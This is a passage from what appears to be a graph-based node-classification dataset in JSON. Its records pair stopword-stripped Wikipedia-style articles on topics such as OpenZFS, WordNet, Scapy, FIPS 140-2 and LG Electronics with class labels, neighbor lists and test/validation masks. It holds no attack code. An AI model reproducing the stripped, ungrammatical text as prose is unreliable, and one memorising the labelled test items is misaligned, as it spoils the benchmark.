    "text": "OpenZFS:openzfs openzfs umbrella project aimed bringing together individuals companies use zfs file system work improvements aiming well making zfs widely used developed open-source manner openzfs brings together developers illumos linux freebsd macos platforms wide range companies high-level goals project include raising awareness quality utility availability open-source implementations zfs encouraging open communication ongoing efforts toward improving open-source variants zfs ensuring consistent reliability functionality performance distributions zfs illumos derived opensolaris provides upstream source code zfs implementations various differences illumos zfs codebase open-source implementations zfs openzfs strategically reducing existing platform-related differences order ease sharing source code founding members openzfs include matt ahrens one main architects zfs zfs file system originally developed sun microsystems solaris operating system zfs source code released 2005 common development distribution license cddl part opensolaris operating system later ported operating systems environments fsf claimed cddl gpl legal incompatibility 2005 sun implementation zfs file system n't used basis development linux kernel module n't merged linux kernel mainline linux distributions include precompiled kernel module workaround fuse framework allows file systems run userspace used linux separation layer licensing issues effect although set issues include performance penalty however april 2016 release ubuntu 16.04 lts includes cddl-licensed zfs linux kernel module maintained separate project outside linux kernel mainline claiming license compatibility following list key events development zfs various implementations leading creation openzfs umbrella project originally version numbers pool file system incremented new features introduced order designate on-disk file system format available features worked well single entity controlled development zfs versioning scheme still use zfs oracle solaris distributed development model single version number far ideal implementations openzfs would need agree changes on-disk file system format solution selected openzfs introduce feature flags new versioning system tags on-disk format changes unique names supports completely independent format changes format changes depend pool moved used openzfs implementations long feature flags use pool supported implementations openzfs uses pool version 5000 indicate use feature flags pool version unchanging number expected never conflict version numbers used oracle proprietary zfs versions legacy version numbers still exist pool versions 1–28 implied pool version 5000 initial proposal use 1000 pool version future on-disk format changes enabled disabled independently via feature flags feature flags exposed pool properties following naming scheme rules example valid property name could shortened pool feature either disabled enabled active state disabled features used on-disk format changes made result features backward-compatible enabled features used on-disk format changes made yet software may make changes time features still backward-compatible active features made backward-incompatible on-disk format changes pool pool feature enabled legacy version pool automatically upgraded 5000 prerequisite features also enabled default new pools created supported features enabled general state feature changed active back enabled undoing way performed on-disk format changes making pool compatible older openzfs implementation however features might possible on-disk format changes associated either features write features read former features openzfs implementation must support capable writing pool supporting features mandatory opening pool read-only mode latter features openzfs implementation must support able read pool open opening pool possible without actually reading example feature adds new on-disk data structure keep track freed datasets openzfs implementation need know data structure access pool read-only mode additionally writing pool features active state possible openzfs implementation support features list feature flags operating systems support available open-zfs.org web site",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      9784,
      7225,
      8772,
      1109,
      11363,
      4708,
      9836,
      7789,
      9844,
      9333,
      6263,
      9335,
      633,
      9343,
      6787,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      3241,
      5293,
      3248,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10436,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      6361,
      8410,
      6365,
      6369,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      6412,
      8461,
      6416,
      1810,
      5397,
      6935,
      1304,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      2424,
      376,
      890,
      11128,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      3487,
      7070,
      10151,
      4011,
      4012,
      1454,
      6062,
      8114,
      2995,
      7603,
      9141,
      8631,
      1464,
      1978,
      9151,
      9665,
      8643,
      10202,
      1501,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 415,
    "label": 3,
    "text": "University_of_Bologna:university bologna university bologna unibo research university bologna italy founded 1088 organised guild students hence studiorum oldest university world well one leading academic institutions italy europe one prestigious italian universities commonly ranking first places national rankings first place study use term universitas corporations students masters came define institution especially famous law school located bologna italy university emblem carries motto alma mater studiorum nourishing mother studies date a.d. 1088 86,500 students 11 schools campuses ravenna forlì cesena rimini branch center abroad buenos aires argentina also school excellence named collegio superiore di bologna associate publisher university bologna bononia university press s.p.a. bup date founding uncertain believed accounts 1088 university granted charter authentica habita holy roman emperor frederick barbarossa 1158 19th century committee historians led giosuè carducci traced founding university back 1088 would make oldest continuously-operating university world however development institution bologna university gradual process paul grendler writes “ likely enough instruction organization existed merit term university 1150s might happened 1180s. ” university arose around mutual aid societies known universitates scholarium foreign students called nations grouped nationality protection city laws imposed collective punishment foreigners crimes debts countrymen students hired scholars city pre-existing lay ecclesiastical schools teach subjects liberal arts notarial law theology ars dictaminis scrivenery lectures given informal schools called scholae time various universitates scholarium decided form larger association studium —thus university studium grew strong position collective bargaining city since derived significant revenue visiting foreign students would depart well treated foreign students bologna received greater rights collective punishment ended also collective bargaining scholars served professors university initiation threat student strike students could enforce demands content courses pay professors would receive university professors hired fired pay determined elected council two representatives every student nation governed institution important decisions requiring majority vote students ratify professors could also fined failed finish classes time complete course material end semester student committee denouncers professors kept tabs reported misbehavior professors powerless however forming collegia doctorum professors ’ committees faculty securing rights set examination fees degree requirements eventually city ended arrangement paying professors tax revenues making chartered public university university historically notable teaching canon civil law indeed set large part aim studying digest central text roman law rediscovered italy 1070 university central development medieval roman law modern times degree granted university doctorate higher education processes harmonised across european community nowadays university offers 101 different laurea laurea breve first-level degrees three years courses followed 108 laurea specialistica laurea magistrale second-level degrees two years however 11 courses maintained preceding rules laurea specialistica ciclo unico laurea magistrale ciclo unico one cycle study five years except medicine dentistry requires six years courses laurea one may attain 1st level master one-year diploma similar postgraduate diploma second-level degrees attained one may proceed 2nd level master specialisation schools residency doctorates research phd 11 schools replace preexisting 23 faculties university structured 33 departments 66 2012 organized homogeneous research domains integrate activities related one faculty new department latin history added 2015 33 departments early 1950s students university bologna among founders review il mulino 25 april 1951 first issue review published bologna short time il mulino became one interesting reference points italy political cultural debate established important editorial relationships italy abroad editorial activities evolved along review 1954 il mulino publishing house società editrice il mulino founded today represents one relevant italian publishers addition initiated research projects focusing mostly educational institutions political system italy eventually led 1964 establishment istituto carlo cattaneo see serafino mazzetti repertorio di tutti professori antichi e moderni della famosa università ... di bologna bologna 1848 2020 qs world university rankings ranked university bologna 177th world well 74th 1st italy reference academic reputation 2019 world university rankings university bologna ranked among world top 200 universities 2019 italian newspaper la repubblica collaboration censis awarded university bologna 1st place academic ranking italian mega-universities 40,000 students tenth year row recording primacy fields internationalization academic structures digital services",
    "neighbors": [
      10049,
      10116,
      9255,
      5804,
      6188,
      2224,
      4916,
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 416,
    "label": 0,
    "text": "WordNet:wordnet wordnet lexical database english language groups english words sets synonyms called synsets provides short definitions usage examples records number relations among synonym sets members wordnet thus seen combination dictionary thesaurus accessible human users via web browser primary use automatic text analysis artificial intelligence applications database software tools released bsd style license freely available download wordnet website lexicographic data lexicographer files compiler called grind producing distributed database available wordnet created cognitive science laboratory princeton university direction psychology professor george armitage miller starting 1985 directed recent years christiane fellbaum project initially funded u.s. office naval research later also u.s. government agencies including darpa national science foundation disruptive technology office formerly advanced research development activity reflex george miller christiane fellbaum awarded 2006 antonio zampolli prize work wordnet november 2012 wordnet latest online-version 3.1 database contains 155 327 words organized 175 979 synsets total 207 016 word-sense pairs compressed form 12 megabytes size wordnet includes lexical categories nouns verbs adjectives adverbs ignores prepositions determiners function words words lexical category roughly synonymous grouped synsets synsets include simplex words well collocations like eat car pool different senses polysemous word form assigned different synsets meaning synset clarified short defining gloss one usage examples example adjective synset synsets connected synsets means semantic relations relations shared lexical categories include semantic relations hold among members linked synsets individual synset members words also connected lexical relations example one sense noun director linked one sense verb direct derived via morphosemantic link morphology functions software distributed database try deduce lemma stem form word user input irregular forms stored list looking ate return eat example nouns verbs organized hierarchies defined hypernym relationships instance one sense word dog found following hypernym hierarchy words level represent synset members set synonyms unique index top level hierarchies organized 25 beginner trees nouns 15 verbs called lexicographic files maintenance level linked unique beginner synset entity noun hierarchies far deeper verb hierarchies adjectives organized hierarchical trees instead two central antonyms hot cold form binary poles 'satellite synonyms steaming chilly connect respective poles via similarity relations adjectives visualized way dumbbells rather trees initial goal wordnet project build lexical database would consistent theories human semantic memory developed late 1960s psychological experiments indicated speakers organized knowledge concepts economic hierarchical fashion retrieval time required access conceptual knowledge seemed directly related number hierarchies speaker needed traverse access knowledge thus speakers could quickly verify canaries sing canary songbird required slightly time verify canaries fly access concept bird superordinate level even time verify canaries skin requiring look-up across multiple levels hyponymy animal experiments underlying theories subject criticism wordnet organization consistent experimental evidence example anomic aphasia selectively affects speakers ability produce words specific semantic category wordnet hierarchy antonymous adjectives wordnet central adjectives dumbbell structure found co-occur far frequently chance fact found hold many languages wordnet sometimes called ontology persistent claim creators make hypernym/hyponym relationships among noun synsets interpreted specialization relations among conceptual categories words wordnet interpreted used lexical ontology computer science sense however ontology corrected used contains hundreds basic semantic inconsistencies example common specializations exclusive categories ii redundancies specialization hierarchy furthermore transforming wordnet lexical ontology usable knowledge representation normally also involve distinguishing specialization relations subtypeof instanceof relations ii associating intuitive unique identifiers category although corrections transformations performed documented part integration wordnet 1.7 cooperatively updatable knowledge base webkb-2 projects claiming re-use wordnet knowledge-based applications typically knowledge-oriented information retrieval simply re-use directly wordnet also converted formal specification means hybrid bottom-up top-down methodology automatically extract association relations wordnet interpret associations terms set conceptual relations formally defined dolce foundational ontology works claim integrated wordnet ontologies content wordnet simply corrected seemed necessary instead wordnet heavily re-interpreted updated whenever suitable case example top-level ontology wordnet re-structured according ontoclean based approach wordnet used primary source constructing lower classes sensus ontology wordnet include information etymology pronunciation words contains limited information usage wordnet aims cover everyday english include much domain-specific terminology wordnet commonly used computational lexicon english word sense disambiguation wsd task aimed assigning context-appropriate meanings i.e synset members words text however argued wordnet encodes sense distinctions fine-grained issue prevents wsd systems achieving level performance comparable humans always agree confronted task selecting sense dictionary matches word context granularity issue tackled proposing clustering methods automatically group together similar senses word wordnets subsequently created languages 2012 survey lists wordnets availability effort propagate usage wordnets global wordnet community slowly re-licensing wordnets open domain researchers developers easily access use wordnets language resources provide ontological lexical knowledge natural language processing tasks open multilingual wordnet provides access open licensed wordnets variety languages linked princeton wordnet english pwn goal make easy use wordnets multiple languages wordnet used number purposes information systems including word-sense disambiguation information retrieval automatic text classification automatic text summarization machine translation even automatic crossword puzzle generation common use wordnet determine similarity words various algorithms proposed including measuring distance among words synsets wordnet graph structure counting number edges among synsets intuition closer two words synsets closer meaning number wordnet-based word similarity algorithms implemented perl package called wordnet :similarity python package called nltk sophisticated wordnet-based similarity techniques include adw whose implementation available java wordnet also used inter-link vocabularies princeton maintains list related projects includes links widely used application programming interfaces available accessing wordnet using various programming languages environments wordnet connected several databases semantic web wordnet also commonly re-used via mappings wordnet synsets categories ontologies often top-level categories wordnet mapped global wordnet association gwa public non-commercial organization provides platform discussing sharing connecting wordnets languages world gwa also promotes standardization wordnets across languages ensure uniformity enumerating synsets human languages gwa keeps list wordnets developed around world wordnet database distributed dictionary package usually single file following software",
    "neighbors": [
      6145,
      8323,
      133,
      8582,
      5639,
      11529,
      8843,
      396,
      2575,
      11538,
      9879,
      538,
      2588,
      6174,
      7839,
      5677,
      7597,
      3504,
      11056,
      2100,
      8118,
      3385,
      9149,
      11206,
      1737,
      7371,
      5197,
      10452,
      2901,
      3811,
      7780,
      8421,
      9577,
      874,
      8554,
      2414,
      11509,
      8440,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 417,
    "label": 8,
    "text": "Acid1:acid1 acid1 originally called box acid test test page web browsers developed october 1998 important establishing baseline interoperability early web browsers especially cascading style sheets 1.0 specification acid tests gold produce quick obvious assessment quality piece metal web acid tests designed produce clear indication browser compliance web standards acid1 tests many features one page reference image acid1 developed todd fahrner frustrated lack stringent tests improve browser interoperability looking tests developed braden mcdaniel used reference renderings clarify intended result fahrner developed comprehensive test resulted quirky-looking graphic 1999 test incorporated css1 test suite text used acid1 allusion t. s. eliot poem hollow men acid1 included offline easter egg internet explorer 5 mac os accessible typing 'tasman text replaced names developers early 2008 major browsers passed acid1 test acid1 served inspiration acid2 acid3",
    "neighbors": [
      2948,
      9029,
      9275,
      6034,
      11223,
      10808,
      2139,
      124,
      8923
    ],
    "mask": "Validation"
  },
  {
    "node_id": 418,
    "label": 4,
    "text": "Scapy:scapy scapy packet manipulation tool computer networks written python philippe biondi forge decode packets send wire capture match requests replies also handle tasks like scanning tracerouting probing unit tests attacks network discovery scapy provides python interface libpcap winpcap/npcap windows similar way wireshark provides view capture gui interface number programs provide visualisation including wireshark decoding packets gnuplot providing graphs graphviz vpython visualisation etc scapy supports python 3 since 2018 scapy 2.4.0+ kamene independent outdated fork scapy originally named scapy3k",
    "neighbors": [
      2569,
      842,
      6345,
      5612,
      6701,
      8554,
      7983,
      11249,
      11221,
      5657,
      7901
    ],
    "mask": "None"
  },
  {
    "node_id": 419,
    "label": 4,
    "text": "Venafi:venafi venafi inc. privately held cybersecurity company develops software secure protect cryptographic keys digital certificates enterprise key certificate management security products certificate authority ca independent manage security instruments transport layer security tls digital certificates secure shell ssh keys venafi sell encryption certificate authority ca venafi reports customer base public- private-sector entities mostly global 5000 organizations operate variety industries venafi headquartered salt lake city utah offices california united kingdom russell thornton ben hodson university washington graduates cofounded venafi predecessor company 1998 recognizing recent consulting project broader commercial application cofounders incorporated company imcentric washington state october 26 2000 seeking infusion angel capital hodson thornton moved company utah joined jayson seegmiller hodson led engineering thornton seegmiller focused business operations application filed conduct business imcentric inc. orem utah march 18 2003 thornton filed change imcentric state incorporation home state washington delaware april 1 2004 early 2005 saw company leadership name change name imcentric venafi leadership thornton president chief executive officer seegmiller vice president secretary treasurer trell rohovit president chief executive officer william clay epstein vice president darren denning secretary company also moved headquarters sandy utah 2005 jeff hudson current chief executive officer replaced rohovit october 2010 company moved salt lake city ut 2013 venafi made-up word created combining two latin roots—vena vein root fides trust faith venafi secures root trust—the encryption keys certificates venafi participating organization payment card industry security standards council pci ssc issues payment card industry data security standard pci dss venafi submitted cryptographic keys digital certificate security guidelines special interest group sig topic consideration 2015 2016 pci ssc sig topic selected finalist 2015 sig 1 7 finalists selected 2016 sig 1 5 finalists selected venafi also member financial services information sharing analysis group fs-isac july 2012 paul turner venafi vice president product strategy co-authored national institute standards technology nist information technology laboratory itl bulletin “ itl bulletin july 2012 preparing responding certification authority compromise fraudulent certificate issuance ” provides best practices-based information 2015 turned teamed nist document best practices security interactive automated access management using secure shell ssh",
    "neighbors": [
      3941,
      517,
      10341,
      5834,
      2932,
      10106,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 420,
    "label": 4,
    "text": "FIPS_140-2:fips 140-2 federal information processing standard fips publication 140-2 fips pub 140-2 u.s. government computer security standard used approve cryptographic modules title security requirements cryptographic modules initial publication may 25 2001 last updated december 3 2002 national institute standards technology nist issued fips 140 publication series coordinate requirements standards cryptography modules include hardware software components protection cryptographic module within security system necessary maintain confidentiality integrity information protected module standard specifies security requirements satisfied cryptographic module standard provides increasing qualitative levels security intended cover wide range potential applications environments security requirements cover areas related secure design implementation cryptographic module areas include cryptographic module specification cryptographic module ports interfaces roles services authentication finite state model physical security operational environment cryptographic key management electromagnetic interference/electromagnetic compatibility emi/emc self-tests design assurance mitigation attacks federal agencies departments validate module use covered existing fips 140-1 fips 140-2 certificate specifies exact module name hardware software firmware and/or applet version numbers cryptographic modules produced private sector open source communities use u.s. government regulated industries financial health-care institutions collect store transfer share disseminate sensitive unclassified sbu information commercial cryptographic module also commonly referred hardware security module hsm fips 140-2 defines four levels security simply named level 1 level 4 specify detail level security required particular application security level 1 provides lowest level security basic security requirements specified cryptographic module e.g. least one approved algorithm approved security function shall used specific physical security mechanisms required security level 1 cryptographic module beyond basic requirement production-grade components example security level 1 cryptographic module personal computer pc encryption board security level 2 improves upon physical security mechanisms security level 1 cryptographic module requiring features show evidence tampering including tamper-evident coatings seals must broken attain physical access plaintext cryptographic keys critical security parameters csps within module pick-resistant locks covers doors protect unauthorized physical access addition tamper-evident physical security mechanisms required security level 2 security level 3 attempts prevent intruder gaining access csps held within cryptographic module physical security mechanisms required security level 3 intended high probability detecting responding attempts physical access use modification cryptographic module physical security mechanisms may include use strong enclosures tamper-detection/response circuitry zeroes plaintext csps removable covers/doors cryptographic module opened security level 4 provides highest level security security level physical security mechanisms provide complete envelope protection around cryptographic module intent detecting responding unauthorized attempts physical access penetration cryptographic module enclosure direction high probability detected resulting immediate deletion plaintext csps security level 4 cryptographic modules useful operation physically unprotected environments security level 4 also protects cryptographic module security compromise due environmental conditions fluctuations outside module normal operating ranges voltage temperature intentional excursions beyond normal operating ranges may used attacker thwart cryptographic module defenses cryptographic module required either include special environmental protection features designed detect fluctuations delete csps undergo rigorous environmental failure testing provide reasonable assurance module affected fluctuations outside normal operating range manner compromise security module levels 2 higher operating platform upon validation applicable also listed vendors always maintain baseline validations fips 140-2 establishes cryptographic module validation program cmvp joint effort nist communications security establishment cse government canada security programs overseen nist cse focus working government industry establish secure systems networks developing managing promoting security assessment tools techniques services supporting programs testing evaluation validation addresses areas development maintenance security metrics security evaluation criteria evaluation methodologies tests test methods security-specific criteria laboratory accreditation guidance use evaluated tested products research address assurance methods system-wide security assessment methodologies security protocol validation activities appropriate coordination assessment-related activities voluntary industry standards bodies assessment regimes fips 140-2 standard information technology security approval program cryptographic modules produced private sector vendors seek products certified use government departments regulated industries financial health-care institutions collect store transfer share disseminate sensitive unclassified sbu information tamper evident fips 140-2 security labels utilized deter detect tampering modules tests cmvp handled third-party laboratories accredited cryptographic module testing laboratories national voluntary laboratory accreditation program nvlap vendors interested validation testing may select twenty-two accredited labs nvlap accredited cryptographic modules testing laboratories perform validation testing cryptographic modules cryptographic modules tested requirements found fips pub 140-2 security requirements cryptographic modules security requirements cover 11 areas related design implementation cryptographic module within areas cryptographic module receives security level rating 1–4 lowest highest depending requirements met areas provide different levels security cryptographic module receives rating reflects fulfillment requirements area overall rating issued cryptographic module indicates vendor validation certificate individual ratings listed well overall rating nist maintains validation lists cryptographic standards testing programs past present lists updated new modules/implementations receive validation certificates nist cse items fips 140-1 fips 140-2 validation list reference validated algorithm implementations appear algorithm validation lists fips pub 140-2 annexes steven marquess posted criticism fips 140-2 validation lead incentives keep vulnerabilities defects hidden cmvp decertify software vulnerabilities found take year re-certify software defects found companies left without certified product ship example steven marquess mentions vulnerability found publicised fixed fips-certified open-source derivative openssl publication meaning openssl derivative decertified decertification hurt companies relying openssl-derivative fips certification contrast companies renamed certified copy open-source openssl derivative decertified even though basically identical fix vulnerability steven marquess therefore argues fips process inadvertently encourages hiding software origins de-associate defects since found original potentially leaving certified copy vulnerable",
    "neighbors": [
      10504,
      265,
      5136,
      3097,
      10908,
      2208,
      10656,
      1314,
      6439,
      9640,
      11432,
      2610,
      8627,
      9408,
      8904,
      9165,
      8657,
      3671,
      7139,
      7153,
      10620,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 421,
    "label": 2,
    "text": "MUSIC/SP:music/sp music/sp multi-user system interactive computing/system product originally mcgill university system interactive computing developed mcgill university 1970s early ibm time-sharing system called rax remote access computing system system ran ibm s/360 s/370 4300-series mainframe hardware offered novel features time file access control data compression designed allow academics students create run programs interactively terminals era mainframe computing still done punched cards years development continued system evolved embrace email internet eventually world wide web peak late 1980s 250 universities colleges high school districts used system north south america europe asia file system music/sp file system unique number respects single system-wide file index owner userid file name hashed locate file index file system could located single i/o operation however presented flat file system user lacked directory structure commonly offered dos microsoft windows unix systems 1990 tree-structured directory view file system overlaid bringing system line file systems available default information stored files compressed offered considerable saving disk space file system fairly sophisticated access control scheme allowing owner control could read write append execute file also concept public file visible users private file visible owner version 2.3 even private files listed common library result two users could files name 4.0 limitation removed virtual memory initial versions system provided support virtual memory address translation one active user could reside core memory time swapping disk used time-share different users variable-length timeslice used virtual memory support introduced 1985 allowed multiple users core memory time removed many restrictions size programs could run provided significant performance improvement system performance also improved pre-loading commonly used modules virtual memory startup time could available users simultaneously programming languages system designed support academic computing teaching computer science rich suite programming languages available system nucleus written ibm/370 assembler native applications written fortran system supported waterloo watfiv watbol compilers also provided compilers pascal c pl/i basic apl algol rpg gpss system missing command scripting language rexx ported cms 1984 later 1986 complete user interface written entirely rexx e-mail internet e-mail one major applications music/sp e-mail interface initially provided access local e-mail networks developed expanded provide access bitnet internet based e-mail music/sp direct access internet 1990 university wisconsin wiscnet tcp/ip code ported system allowing system provide access internet services compatibility ibm systems major feature system ability run programs designed run ibm mainstream operating system mvs accomplished using mvs emulator intercepted system calls supervisor call instruction svc level third-party applications ran mode rather write version application music/sp developers would usually start mvs version rebuild run mvs emulation mode since mvs emulation limited subset real thing applications generally ran efficiently music/sp features one major advantage system educational environments use special lines called control cards top file source files supported language could automatically directed appropriate compiler fortran default compiled linked executed compilation linkage execution options also specified control cards simply entering filename command line wide variety terminals supported 1980 including ebcdic-based units using ibm-proprietary protocols asynchronous ascii-based units since terminals connected various types front-end processors per common ibm timesharing practice could therefore function without cpu attention considerable amount time music used variable-length time slices could compute-bound processing reach maximum several seconds per time slice conversely user filled output buffer reached conversational read timeslice would end immediately sim390 emulator runs microsoft windows contains demonstration system music/sp freely available demonstration system also run hercules users run windows",
    "neighbors": [
      512,
      2560,
      6155,
      7186,
      6675,
      7187,
      7188,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      7733,
      9784,
      10809,
      573,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      9829,
      6248,
      6760,
      8298,
      9835,
      10856,
      6772,
      7285,
      4727,
      2168,
      119,
      634,
      1147,
      2172,
      3197,
      1150,
      5247,
      9335,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9361,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      7848,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      1219,
      8388,
      6342,
      1736,
      2248,
      9932,
      5840,
      1235,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      2811,
      3323,
      2813,
      1278,
      9468,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      3358,
      3359,
      10016,
      292,
      10235,
      2345,
      1323,
      7983,
      2355,
      7477,
      8502,
      823,
      10040,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      8524,
      5457,
      11601,
      7507,
      7511,
      10590,
      863,
      3426,
      868,
      3429,
      8551,
      5484,
      7020,
      3443,
      5492,
      2933,
      11635,
      376,
      8573,
      7039,
      8063,
      6529,
      10113,
      4996,
      8069,
      394,
      3978,
      4492,
      7053,
      8077,
      7057,
      11667,
      11673,
      11675,
      8092,
      6557,
      2462,
      5022,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      5562,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      4565,
      2519,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 422,
    "label": 4,
    "text": "PhishTank:phishtank phishtank anti-phishing site phishtank launched october 2006 entrepreneur david ulevitch offshoot opendns company offers community-based phish verification system users submit suspected phishes users vote phish phishtank used opera yahoo mail mcafee apwg cmu st benard mozilla kaspersky firetrust officer blue finra message level surbl sanesecurity clamav career builder site truth avira c-sirt phishtank sitechecker phishtank data provided gratis download access via api call including commercial use restrictive license 2018 announced phishtank rebuilding website new features functionality work begin 2019 phishtank currently ran thomas mccourt cisco talos undertaking rebuild project",
    "neighbors": [
      8584,
      7362,
      1242,
      4722
    ],
    "mask": "Test"
  },
  {
    "node_id": 423,
    "label": 4,
    "text": "Prevx:prevx prevx discontinued anti-malware utility separate real-time on-demand versions remove low-risk adware free user purchase enter license key serious scanning take anywhere less two minutes five minutes tony zaitoun about.com liked utility except confusion configuring interface key protection disabled default issue referenced since corrected prevx limited formed march 2001 uk registered name “ immunify ” changing name “ trustcorps ” later year finally re-branded “ prevx ” 2003 founder team led nick ray ceo paul stubbs coo originally positioned host intrusion prevention system company initial software product designed protect unix linux servers advanced malware threats without reliance malware signatures thus providing protection unknown “ zero-day ” threats software positioned last line defence threats bypassed overcome firewall network security installed anti-virus host-based protection systems early product monitored behaviour executables real-time would block system calls breached rules thus providing protection offered protection buffer overflow attacks could successfully detect rootkits attempted hide memory disk end 2002 company received investment south east growth fund early 2003 private investors angel network hotbed 2003 company rebranded prevx june 2004 launched first product windows platform “ prevx home beta ” offered freeware download prevx home 1.0 also free followed september 2004 prevx home 2.0 launched october 2004 incorporated functionality report security events detected central database operated prevx would allow prevx monitor new virus outbreaks detect block spyware end 2004 6 months launching 1m copies prevx downloaded subsequent versions included prevx 3.0 prevx edge prevx csi prevx stirred controversy amongst internet communities announced november 27 2009 recent windows update causing black screen death affecting users windows xp vista 7 claimed bug rendered machine unusable later discovered black screen caused malware infection daonol unrelated windows update prevx apologized earlier claims 2005 prevx acquired share offer retento limited investment vehicle owned serial entrepreneur mel morris joined prevx board june 2003 investor prevx introduced hotbed retento subsequently renamed prevx group limited november 2010 prevx acquired us-based internet security company webroot full conditions deal released announcement made webroot fully integrate prevx behaviour-based antivirus technology existing software also make mel morris founder chief executive prevx group vice president webroot prevx division webroot since discontinued prevx product line although technology concepts continue underpin webroot products",
    "neighbors": [
      877,
      6797,
      7983,
      9713,
      10297,
      1629
    ],
    "mask": "Test"
  },
  {
    "node_id": 424,
    "label": 3,
    "text": "LG_Electronics:lg electronics lg electronics inc. south korean multinational electronics company headquartered yeouido-dong seoul south korea lg electronics part fourth-largest chaebol south korea lg corporation 2014 global sales reached 55.91 billion ₩ 59.04 trillion lg comprises four business units home entertainment mobile communications home appliances air solutions vehicle components starion india main production vendor refrigeration washing machines indian sub-continent lg electronics owns zenith controls 37.9 percent lg display since 2008 lg electronics remains world second-largest lcd television manufacturer company 128 operations worldwide employing 83,000 people 1958 lg electronics founded goldstar hangul 금성 established aftermath korean war provide rebuilding nation domestically-produced consumer electronics home appliances lg electronics produced south korea first radios tvs refrigerators washing machines air conditioners goldstar one lg groups brethren company lak-hui pronounced lucky chemical industrial corp. lg chem lg households goldstar merged lucky chemical ls cable 28 february 1995 changing corporate name lucky-goldstar finally lg electronics lg electronics earned us 100 million revenue exports first time history rapid growth globalization saw company establish first overseas production based united states 1982 1994 goldstar officially adopted lg electronics brand new corporate logo 1995 lg electronics acquired us-based tv manufacturer zenith also year lg electronics made world first cdma digital mobile handsets supplied ameritech gte us company also awarded ul certification us 1998 lg developed world first 60-inch plasma tv 1999 established joint venture philips lg.philips lcd goes name lg display order create holding company former lg electronics split 2002 new lg electronics spun old lg electronics changing name lg ei merged lg ci 2003 legal successor former lg chem company started goldstar currently exist lg electronics plays large role global consumer electronics industry second-largest lcd tv manufacturer worldwide 2013 2005 lg top 100 global brand 2006 lg recorded brand growth 14 display manufacturing affiliate lg display 2009 world largest lcd panel manufacturer 2010 lg electronics entered smartphone industry since lg electronics continued develop various electronic products releasing world first 84-inch ultra-hd tv retail sale 5 december 2012 antitrust regulators european union fined lg electronics five major companies samsung thomson since 2010 known technicolor matsushita today panasonic corp philips toshiba fixing prices tv cathode-ray tubes two cartels lasting nearly decade 11 june 2015 lg electronics found midst human rights controversy guardian published article rosa moreno former employee lg television assembly factory end 2016 lg electronics merged german branch situated ratingen european headquarter situated london together eschborn suburb frankfurt main march 2017 lg electronics sued handling hardware failures recent smartphones lg g4 july 2018 koo bon-joon ceo vice chairman replaced nephew implementing first son-only succession rule also involved rule present ceo lg corporation parent company koo kwang-mo succeeding father koo bon-moo died brain tumor may 20 2018 november 2018 lg announced hwang jeong-hwan took job president lg mobile communications october 2017 replaced brian kwon head lg hugely profitable home entertainment business 1 december 2018 lg electronics four business units lg electronics products include televisions home theater systems refrigerators washing machines computer monitors wearable devices smart appliances smartphones lg sl9000 one several new borderless hdtv advertised release ifa berlin 2009 lg electronics launched oled tv 2013 65-inch 77-inch sizes 2014 lg electronics introduced first internet tv 2007 originally branded netcast entertainment access devices later renamed 2011 internet televisions lg smart tv interactive television features added enable audience receive information internet watching conventional tv programming november 2013 blogger discovered lg smart tvs silently collect filenames attached usb storage devices program viewing data transmit information lg servers lg-affiliated servers shortly blog entry went live lg disabled playback site video explaining viewer analytics work closed brightcove account video hosted lg manufactures remote control models use hillcrest labs freespace technology allow users change channels using gestures dragon naturallyspeaking technology voice recognition 2014 lg using webos ribbon interface smart tvs lg reported first eight months release sold 5 million webos tvs 2016 exclusively india indian arm south korea lg electronics inc started selling tv would repel mosquitoes uses ultrasonic waves silent humans cause mosquitoes fly away released 16 june 2016 technology also used air conditioners washing machines tv aimed lower-income consumers living conditions would make susceptible mosquitoes 2018 reported lg planning sell big-screen televisions could rolled retract automatically push button come 2019 lg electronics manufactures smartphones tablet devices g3 lg officially unveiled curved smartphone g flex 27 october 2013 lg released south korea november 2013 later announced releases europe rest asia north america consumer electronics show january 2014 lg announced u.s. release g2 across several major carriers 2015 lg released lg g4 globally late may early june 7 september 2016 lg unveiled v20 v30 announced 31 august 2017 lg g6 officially announced mwc 2017 26 february 2017 introduction g7 thinq model scheduled 2 may 2018 media briefing 2014 lg announced three new additions g series tablets lg knock code feature allowing users unlock devices series taps tablets also feature q pair allows tablets sync smartphone phone calls text messages passed tablet real time lg google announced android wear-based smartwatch lg g watch june 2014 august 2014 lg g watch r circular face similar moto 360 released lg watch urbane lg third android wear-based smart watch released april 2015 first device support newer smartwatch features wi-fi new parts android wear software interface like ability draw emoji friends 2015 lg announced bluetooth keyboard folds along four rows keys portability rolly keyboard 